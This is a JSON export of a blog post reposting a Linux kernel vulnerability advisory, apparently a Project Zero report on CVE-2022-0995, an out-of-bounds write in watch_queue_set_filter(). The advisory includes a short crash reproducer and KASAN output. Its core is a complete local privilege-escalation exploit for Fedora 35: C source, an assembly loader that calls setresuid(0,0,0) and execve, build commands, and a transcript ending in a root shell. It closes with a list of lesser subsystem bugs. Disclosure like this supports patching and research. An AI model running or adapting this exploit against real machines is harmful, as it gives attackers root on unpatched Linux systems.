{"id":23378,"date":"2022-04-19T19:29:54","date_gmt":"2022-04-19T15:29:54","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/166770\/GS20220419150504.txt"},"modified":"2022-05-09T07:52:10","modified_gmt":"2022-05-09T03:22:10","slug":"linux-watch_queue-filter-out-of-bounds-write","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/linux-watch_queue-filter-out-of-bounds-write\/","title":{"rendered":"Linux watch_queue Filter Out-Of-Bounds Write"},"content":{"rendered":"<p dir=\"ltr\">Linux: watch_queue filter OOB write (and other bugs)<\/p>\n<p dir=\"ltr\">This bug report is about things in the watch_queue subsystem,<br \/>\nwhich is only enabled under CONFIG_WATCH_QUEUE. That seems to be<br \/>\ndisabled e.g. on Debian, but Ubuntu and Fedora enable it.<\/p>\n<p dir=\"ltr\">The watch_queue subsystem has a bug that leads to out-of-bounds<br \/>\nwrite in watch_queue_set_filter():<br \/>\nThe first loop correctly checks for<\/p>\n<p dir=\"ltr\">if (tf[i].type &gt;= sizeof(wfilter-&gt;type_filter) * 8)<\/p>\n<p dir=\"ltr\">but the second loop has the bound for .type wrong by a factor of 8<br \/>\n(on 64-bit systems):<\/p>\n<p dir=\"ltr\">if (tf[i].type &gt;= sizeof(wfilter-&gt;type_filter) * BITS_PER_LONG)<\/p>\n<p dir=\"ltr\">This leads to two out-of-bounds writes:<\/p>\n<p dir=\"ltr\">1. out-of-bounds __set_bit() on wfilter-&gt;type_filter<br \/>\n2. out-of-bounds write of array elements behind wfilter-&gt;filters<\/p>\n<p dir=\"ltr\">The following reproducer triggers an ASAN splat:<br \/>\n&#8220;`<br \/>\n#define _GNU_SOURCE<br \/>\n#include &lt;unistd.h&gt;<br \/>\n#include &lt;err.h&gt;<br \/>\n#include &lt;stdio.h&gt;<br \/>\n#include &lt;stdlib.h&gt;<br \/>\n#include &lt;sys\/ioctl.h&gt;<br \/>\n#include &lt;sys\/syscall.h&gt;<br \/>\n#include &lt;linux\/watch_queue.h&gt;<\/p>\n<p dir=\"ltr\">int main(void) {<br \/>\nint pipefds[2];<br \/>\nif (pipe2(pipefds, O_NOTIFICATION_PIPE))<br \/>\nerr(1, \\&#8221;pipe2\\&#8221;);<br \/>\nint pfd = pipefds[0];<\/p>\n<p dir=\"ltr\">struct watch_notification_filter *filter =<br \/>\nmalloc(sizeof(struct watch_notification_filter) +<br \/>\nsizeof(struct watch_notification_type_filter));<br \/>\nfilter-&gt;nr_filters = 1;<br \/>\nfilter-&gt;__reserved = 0;<br \/>\nfilter-&gt;filters[0] = (struct watch_notification_type_filter){ .type = 1023 };<br \/>\nif (ioctl(pfd, IOC_WATCH_QUEUE_SET_FILTER, filter))<br \/>\nerr(1, \\&#8221;SET_FILTER\\&#8221;);<br \/>\n}<br \/>\n&#8220;`<\/p>\n<p dir=\"ltr\">Here&#8217;s the splat:<br \/>\n&#8220;`<br \/>\n[ 83.180406][ T611] ==================================================================<br \/>\n[ 83.181694][ T611] BUG: KASAN: slab-out-of-bounds in watch_queue_set_filter+0x659\/0x740<br \/>\n[ 83.182928][ T611] Write of size 4 at addr ffff88800d2c66bc by task watch_queue_oob\/611<br \/>\n[&#8230;]\n[ 83.187234][ T611] Call Trace:<br \/>\n[ 83.187712][ T611] &lt;TASK&gt;<br \/>\n[ 83.188133][ T611] dump_stack_lvl+0x45\/0x59<br \/>\n[ 83.188796][ T611] print_address_description.constprop.0+0x1f\/0x150<br \/>\n[&#8230;]\n[ 83.190539][ T611] kasan_report.cold+0x7f\/0x11b<br \/>\n[&#8230;]\n[ 83.192236][ T611] watch_queue_set_filter+0x659\/0x740<br \/>\n[&#8230;]\n[ 83.194563][ T611] __x64_sys_ioctl+0x127\/0x190<br \/>\n[ 83.195297][ T611] do_syscall_64+0x43\/0x90<br \/>\n[ 83.195941][ T611] entry_SYSCALL_64_after_hwframe+0x44\/0xae<br \/>\n[&#8230;]\n[ 83.208194][ T611] Allocated by task 611:<br \/>\n[ 83.208807][ T611] kasan_save_stack+0x1e\/0x40<br \/>\n[ 83.209479][ T611] __kasan_kmalloc+0x81\/0xa0<br \/>\n[ 83.210258][ T611] watch_queue_set_filter+0x23a\/0x740<br \/>\n[ 83.211027][ T611] __x64_sys_ioctl+0x127\/0x190<br \/>\n[ 83.211708][ T611] do_syscall_64+0x43\/0x90<br \/>\n[ 83.212341][ T611] entry_SYSCALL_64_after_hwframe+0x44\/0xae<br \/>\n[ 83.213177][ T611]\n[ 83.213510][ T611] The buggy address belongs to the object at ffff88800d2c66a0<br \/>\n[ 83.213510][ T611] which belongs to the cache kmalloc-32 of size 32<br \/>\n[ 83.215452][ T611] The buggy address is located 28 bytes inside of<br \/>\n[ 83.215452][ T611] 32-byte region [ffff88800d2c66a0, ffff88800d2c66c0)<br \/>\n&#8220;`<\/p>\n<p dir=\"ltr\">In case you&#8217;re wondering why syzkaller never managed to hit this:<br \/>\nIt actually has a definition file for watch queue stuff<br \/>\n(https:\/\/github.com\/google\/syzkaller\/blob\/master\/sys\/linux\/dev_watch_queue.txt),<br \/>\nbut that seems to be based on an older version of the series that introduced<br \/>\nwatch queues, so syzkaller doesn&#8217;t know about O_NOTIFICATION_PIPE and instead<br \/>\ntries to open \/dev\/watch_queue.<\/p>\n<p dir=\"ltr\">Here&#8217;s an extremely shoddy exploit that will sometimes give you a root shell<br \/>\non Fedora 35 and sometimes instead make the system hang\/panic:<br \/>\n&#8220;`<br \/>\n[user@fedora watch_queue]$ cat watch_queue_oob_elf_phdr.c<br \/>\n#define _GNU_SOURCE<br \/>\n#include &lt;unistd.h&gt;<br \/>\n#include &lt;err.h&gt;<br \/>\n#include &lt;stdio.h&gt;<br \/>\n#include &lt;stddef.h&gt;<br \/>\n#include &lt;sched.h&gt;<br \/>\n\/\/header conflict :\/<br \/>\n\/\/#include &lt;fcntl.h&gt;<br \/>\nint open(const char *pathname, int flags, &#8230;);<br \/>\n#include &lt;stdlib.h&gt;<br \/>\n#include &lt;sys\/ioctl.h&gt;<br \/>\n#include &lt;sys\/inotify.h&gt;<br \/>\n#include &lt;sys\/eventfd.h&gt;<br \/>\n#include &lt;sys\/resource.h&gt;<br \/>\n#include &lt;sys\/xattr.h&gt;<br \/>\n#include &lt;sys\/wait.h&gt;<br \/>\n#include &lt;sys\/mount.h&gt;<br \/>\n#include &lt;sys\/syscall.h&gt;<br \/>\n#include &lt;linux\/watch_queue.h&gt;<br \/>\n#include &lt;linux\/elf.h&gt;<\/p>\n<p dir=\"ltr\">#define SYSCHK(x) ({ \\\\<br \/>\ntypeof(x) __res = (x); \\\\<br \/>\nif (__res == (typeof(x))-1) \\\\<br \/>\nerr(1, \\&#8221;SYSCHK(\\&#8221; #x \\&#8221;)\\&#8221;); \\\\<br \/>\n__res; \\\\<br \/>\n})<\/p>\n<p dir=\"ltr\">int main(void) {<br \/>\nstruct rlimit rlim_nofile;<br \/>\nSYSCHK(getrlimit(RLIMIT_NOFILE, &amp;rlim_nofile));<br \/>\nrlim_nofile.rlim_cur = rlim_nofile.rlim_max;<br \/>\nSYSCHK(setrlimit(RLIMIT_NOFILE, &amp;rlim_nofile));<\/p>\n<p dir=\"ltr\">\/\/ pin to one CPU core<br \/>\ncpu_set_t cpu_set;<br \/>\nCPU_ZERO(&amp;cpu_set);<br \/>\nCPU_SET(0, &amp;cpu_set);<br \/>\nSYSCHK(sched_setaffinity(0, sizeof(cpu_set_t), &amp;cpu_set));<\/p>\n<p dir=\"ltr\">\/\/ create notification pipes, without filters yet<br \/>\nint pfds[128];<br \/>\nfor (int i=0; i&lt;128; i++) {<br \/>\nint pipefds[2];<br \/>\nSYSCHK(pipe2(pipefds, O_NOTIFICATION_PIPE));<br \/>\npfds[i] = pipefds[0];<br \/>\nclose(pipefds[1]);<br \/>\n}<\/p>\n<p dir=\"ltr\">\/\/ create a child with SCHED_IDLE policy that runs execve() when told to<br \/>\nint continue_eventfd = SYSCHK(eventfd(0, 0));<br \/>\npid_t child = SYSCHK(fork());<br \/>\nif (child == 0) {<br \/>\nstruct sched_param param = { .sched_priority = 0 };<br \/>\nSYSCHK(sched_setscheduler(0, SCHED_IDLE, &amp;param));<\/p>\n<p dir=\"ltr\">eventfd_t evfd_value;<br \/>\nSYSCHK(eventfd_read(continue_eventfd, &amp;evfd_value));<\/p>\n<p dir=\"ltr\">SYSCHK(execl(\\&#8221;\/usr\/bin\/newgrp\\&#8221;, \\&#8221;newgrp\\&#8221;, \\&#8221;&#8211;bogus\\&#8221;, \\&#8221;\/bin\/bash\\&#8221;, NULL));<br \/>\n}<\/p>\n<p dir=\"ltr\">\/\/ set up an inotify watch to notify us every time the ELF parser reads from<br \/>\n\/\/ the ELF binary (which involves preempting the ELF parser).<br \/>\nint infd = SYSCHK(inotify_init());<br \/>\nSYSCHK(inotify_add_watch(infd, \\&#8221;\/usr\/bin\/newgrp\\&#8221;, IN_ACCESS));<\/p>\n<p dir=\"ltr\">\/\/ spam kmalloc-32 a bit. note that this might not be enough spam, depending<br \/>\n\/\/ on how fragmented the slab is&#8230;<br \/>\n\/\/ after spamming the slab, free all our allocations again, so that hopefully<br \/>\n\/\/ we end up with a (more or less) empty CPU slab.<br \/>\n#define NUM_SPAM 10000 \/* 900 *\/<br \/>\nSYSCHK(unshare(CLONE_NEWUSER|CLONE_NEWNS));<br \/>\nSYSCHK(mount(\\&#8221;none\\&#8221;, \\&#8221;\/dev\/shm\\&#8221;, \\&#8221;tmpfs\\&#8221;, MS_NOSUID|MS_NODEV, \\&#8221;\\&#8221;));<br \/>\nint tmpfile = SYSCHK(open(\\&#8221;\/dev\/shm\/\\&#8221;, O_TMPFILE|O_RDWR, 0666));<br \/>\nfor (int i=0; i&lt;NUM_SPAM; i++) {<br \/>\nchar name[14] = \\&#8221;security.XXXX\\&#8221;;<br \/>\nname[ 9] = &#8216;A&#8217; + ((i &gt;&gt; 0) % 16);<br \/>\nname[10] = &#8216;A&#8217; + ((i &gt;&gt; 4) % 16);<br \/>\nname[11] = &#8216;A&#8217; + ((i &gt;&gt; 8) % 16);<br \/>\nname[12] = &#8216;A&#8217; + ((i &gt;&gt; 12) % 16);<br \/>\nSYSCHK(fsetxattr(tmpfile, name, \\&#8221;\\&#8221;, 0, XATTR_CREATE));<br \/>\n}<br \/>\nclose(tmpfile);<\/p>\n<p dir=\"ltr\">\/\/ launch the ELF parser and preempt at every read.<br \/>\n\/\/ note that PREEMPT_VOLUNTARY means we actually don&#8217;t get rescheduled<br \/>\n\/\/ directly at kernel_read(), instead it happens on the next kmalloc():<br \/>\n\/\/ __kmalloc() -&gt; slab_alloc() -&gt; slab_alloc_node() -&gt; slab_pre_alloc_hook()<br \/>\n\/\/ -&gt; might_alloc() -&gt; might_sleep_if() -&gt; might_sleep() -&gt; might_resched()<br \/>\n\/\/ -&gt; __cond_resched()<br \/>\n\/\/<br \/>\n\/\/ First preemption is the allocation of memory for program headers,<br \/>\n\/\/ second preemption is the allocation of memory for the interpreter name.<br \/>\n\/\/ At the second preemption, the program headers have been loaded into<br \/>\n\/\/ memory but the interpreter name&#8217;s offset hasn&#8217;t been read yet.<br \/>\n\/\/ Third preemption is after the interpreter name has been stored in the<br \/>\n\/\/ allocation but before it is passed to the VFS for opening.<br \/>\nSYSCHK(eventfd_write(continue_eventfd, 1));<br \/>\nfor (int i=0; i&lt;3; i++) {<br \/>\nstruct inotify_event inev;<br \/>\nif (SYSCHK(read(infd, &amp;inev, sizeof(inev))) != sizeof(inev))<br \/>\nerrx(1, \\&#8221;bad inotify_event size\\&#8221;);<br \/>\n}<\/p>\n<p dir=\"ltr\">struct watch_notification_filter *filter =<br \/>\nmalloc(sizeof(struct watch_notification_filter) +<br \/>\n2 * sizeof(struct watch_notification_type_filter));<br \/>\nfilter-&gt;nr_filters = 1;<br \/>\nfilter-&gt;__reserved = 0;<br \/>\nfilter-&gt;filters[0] = (struct watch_notification_type_filter){<br \/>\n.type = 20 * 8,<br \/>\n.info_mask = 0x80<br \/>\n};<br \/>\nfor (int i=0; i&lt;127; i++) {<br \/>\nSYSCHK(ioctl(pfds[i], IOC_WATCH_QUEUE_SET_FILTER, filter));<br \/>\n}<\/p>\n<p dir=\"ltr\">int status;<br \/>\nint wait_res = wait(&amp;status);<br \/>\nprintf(\\&#8221;wait_res = %d\\<br \/>\n\\&#8221;, wait_res);<br \/>\nif (WIFEXITED(status)) {<br \/>\nprintf(\\&#8221;exited with status %d\\<br \/>\n\\&#8221;, WEXITSTATUS(status));<br \/>\n} else if (WIFSIGNALED(status)) {<br \/>\nprintf(\\&#8221;signaled with signal %d\\<br \/>\n\\&#8221;, WTERMSIG(status));<br \/>\n} else {<br \/>\nprintf(\\&#8221;other?\\<br \/>\n\\&#8221;);<br \/>\n}<br \/>\n}<br \/>\n[user@fedora watch_queue]$ gcc -o watch_queue_oob_elf_phdr watch_queue_oob_elf_phdr.c<br \/>\n[user@fedora watch_queue]$ cat bogus-loader.S<br \/>\n.global _start<br \/>\n_start:<br \/>\n\/* setresuid(0, 0, 0) *\/<br \/>\nmov $117, %eax<br \/>\nmov $0, %rdi<br \/>\nmov $0, %rsi<br \/>\nmov $0, %rdx<br \/>\nsyscall<\/p>\n<p dir=\"ltr\">\/* execve(argv[2], argv+2, envv) *\/<br \/>\nmov $59, %eax<br \/>\nmov 24(%rsp), %rdi<br \/>\nlea 24(%rsp), %rsi<br \/>\nlea 40(%rsp), %rdx \/* assume argc==3 *\/<br \/>\nsyscall<br \/>\nint $3<br \/>\n[user@fedora watch_queue]$ as -o bogus-loader.o bogus-loader.S<br \/>\n[user@fedora watch_queue]$ ld -shared -o $&#8217;\\\\x80&#8242; bogus-loader.o<br \/>\n[user@fedora watch_queue]$ .\/watch_queue_oob_elf_phdr<br \/>\n[root@fedora watch_queue]# id<br \/>\nuid=0(root) gid=1000(user) groups=1000(user),10(wheel) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023<br \/>\n&#8220;`<\/p>\n<p dir=\"ltr\">There are also some other bugs in the subsystem, but those are less<br \/>\neasy to exploit or not security bugs at all:<\/p>\n<p dir=\"ltr\">1. free_pipe_info() first calls put_watch_queue(), which RCU-frees the<br \/>\nstruct watch_queue. Then afterwards it calls pipe_buf_release() on the<br \/>\npipe buffers, which calls watch_queue_pipe_buf_release(), which calls<br \/>\nset_bit() on the already RCU-freed watch_queue. This is at least<br \/>\ntheoretically a UAF, in particular under CONFIG_PREEPMT.<\/p>\n<p dir=\"ltr\">2. watch_queue_pipe_buf_ops has a .get handler that calls<br \/>\ntry_get_page() and a .release handler that doesn&#8217;t touch the page count.<br \/>\nThis would be a bug, except that this is dead code because none of the<br \/>\nsplice stuff works on notification pipes.<\/p>\n<p dir=\"ltr\">3. From what I can tell, watch_queue_set_size() permits setting a<br \/>\nnon-power-of-two number of buffers, which will break the code that<br \/>\nassumes that you can use bitmasks instead of modulo for indexing into<br \/>\nthe pipe buffers array.<\/p>\n<p dir=\"ltr\">4. watch_queue_set_size() sets wqueue-&gt;nr_notes to nr_notes rounded up<br \/>\nto a multiple of WATCH_QUEUE_NOTES_PER_PAGE while allocating the<br \/>\n-&gt;notes_bitmap with size nr_notes bits rounded up to a multiple of<br \/>\nBITS_PER_LONG. On architectures with big PAGE_SIZE, this could lead to<br \/>\nwqueue-&gt;nr_notes being bigger than the bitmap.<\/p>\n<p dir=\"ltr\">5. wqueue-&gt;notes_bitmap is never freed.<\/p>\n<p dir=\"ltr\">6. There is no synchronization between post_one_notification() and<br \/>\npipe_read(), neither locking nor smp_store_release().<\/p>\n<p dir=\"ltr\">7. watch_queue_clear() has a comment claiming that -&gt;defunct prevents<br \/>\nnew additions and notifications, but actually it only prevents<br \/>\nnotifications, not additions.<\/p>\n<p dir=\"ltr\">This bug is subject to a 90-day disclosure deadline. If a fix for this<br \/>\nissue is made available to users before the end of the 90-day deadline,<br \/>\nthis bug report will become public 30 days after the fix was made<br \/>\navailable. Otherwise, this bug report will become public at the deadline.<br \/>\nThe scheduled deadline is 2022-06-08.<\/p>\n<p dir=\"ltr\">Related CVE Numbers: CVE-2022-0995.<\/p>\n<p dir=\"ltr\">Found by: jannh@google.com<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Linux: watch_queue filter OOB write (and other bugs) This bug report is about things in the watch_queue subsystem, which is only enabled under CONFIG_WATCH_QUEUE. That seems to be disabled e.g. on Debian, but Ubuntu and Fedora enable it. The watch_queue subsystem has a bug that leads to out-of-bounds write in watch_queue_set_filter(): The first loop correctly &hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-23378","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/23378","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=23378"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/23378\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=23378"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=23378"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=23378"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}